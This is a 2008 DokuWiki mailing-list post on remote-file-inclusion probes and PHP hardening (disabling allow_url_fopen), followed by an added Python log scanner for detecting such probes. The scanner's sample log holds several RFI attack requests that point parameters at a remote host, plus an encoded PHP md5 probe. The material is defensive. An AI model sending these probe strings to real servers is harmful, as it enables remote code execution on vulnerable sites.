[dokuwiki] Re: attempt to use possible vulnerability of dokuwiki

  • From: Jonathan Dill <jonathan@xxxxxxxxx>
  • To: dokuwiki@xxxxxxxxxxxxx
  • Date: Wed, 06 Feb 2008 18:50:32 -0500

Digging back through web log files, there has been a "surge" in this type of activity lately where the target is the <?php echo md5("just_a_test");?>, but this type of exploit is nothing new.

Here is a decent recent article from CIAC explaining the issues in basic terms. These attempts appear to be targeting index.php in general; I found attempts in the logs of several non-dokuwiki sites as well. The issue is not with dokuwiki, but with how you have configured PHP and your web server: hopefully allow_url_fopen = 'off', and you do not have anything that requires that capability, or else try to use cURL instead. Newer PHP uses a "wrapper" which can be used to restrict what can be included.

http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml

Docs from PHP website:
http://us2.php.net/filesystem

See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html

Recommendations

You should disable allow_url_fopen in the php.ini file:

; Disable allow_url_fopen for security reasons
allow_url_fopen = 'off'

The setting can also be disabled in apache's httpd.conf file:

# Disable allow_url_fopen for security reasons
php_flag  allow_url_fopen  off

For remote file access, consider using the cURL functions that PHP provides.

Jonathan
--
DokuWiki mailing list - more info at
http://wiki.splitbrain.org/wiki:mailinglist
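As an added example (not part of Jonathan's post, the CIAC bulletin, or DokuWiki's own code), here is a small scanner that runs over Apache combined-format access log lines and flags the remote-file-inclusion probes the post describes: a query parameter carrying a remote http/https/ftp URL, or the "echo md5("just_a_test")" style payload that proves the include executed. The log lines, IP addresses and parameter names below are constructed for illustration; the regular expression assumes the default combined log format.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format access logs.

Added example; not from the mailing-list post or DokuWiki. SAMPLE_LOG below is
constructed, with documentation-range addresses, to exercise the scanner.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format; only the fields the scanner needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Strings typical of an RFI probe: the attacker includes a remote file whose
# PHP prints a known value so the response proves the include executed.
PROBE_MARKERS = ("just_a_test", "md5(", "<?php")

# Constructed sample: a classic page= include probe, a benign DokuWiki request,
# a double-encoded probe against another app's config variable (%253F -> ?),
# and a probe that echoes md5("just_a_test") directly through the parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2008:18:21:03 -0500] "GET /index.php?page=http://198.51.100.9/id.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.8 - - [06/Feb/2008:18:21:04 -0500] "GET /doku.php?id=start HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.23 - - [06/Feb/2008:18:25:11 -0500] "GET /index.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://198.51.100.9/x.txt%253F HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
203.0.113.7 - - [06/Feb/2008:18:30:42 -0500] "GET /index.php?page=%3C%3Fphp%20echo%20md5%28%22just_a_test%22%29%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""


def suspicious_params(target):
    """Return [(name, value, reason)] for query parameters that look like RFI payloads."""
    query = urlsplit(target).query
    out = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time so double-encoded
        # payloads (e.g. %253F for a trailing '?') are inspected as PHP would see them.
        v = unquote(value).strip()
        low = v.lower()
        if low.startswith(REMOTE_SCHEMES):
            out.append((name, v, "remote URL passed to parameter"))
        elif any(marker in low for marker in PROBE_MARKERS):
            out.append((name, v, "code-execution probe marker"))
    return out


def scan(lines):
    """Return one dict per log line that carries an RFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        params = suspicious_params(m.group("target"))
        if params:
            hits.append({"ip": m.group("ip"), "time": m.group("time"),
                         "status": m.group("status"), "target": m.group("target"),
                         "params": params})
    return hits


def remote_hosts(hits):
    """Hosts the probes tried to pull code from (useful for blocklists or abuse reports)."""
    hosts = set()
    for hit in hits:
        for _name, value, reason in hit["params"]:
            if reason.startswith("remote URL"):
                host = urlsplit(value).hostname
                if host:
                    hosts.add(host)
    return hosts


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        for name, value, reason in hit["params"]:
            print(f"{hit['time']} {hit['ip']} {hit['status']} {name}={value!r}: {reason}")
    print("remote hosts:", sorted(remote_hosts(scan(SAMPLE_LOG.splitlines()))))
```

A 200 on a flagged line does not by itself mean the include worked; with allow_url_fopen off the script usually renders normally and the probe fails silently, so confirm by checking the response body or the PHP error log rather than the status code alone.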
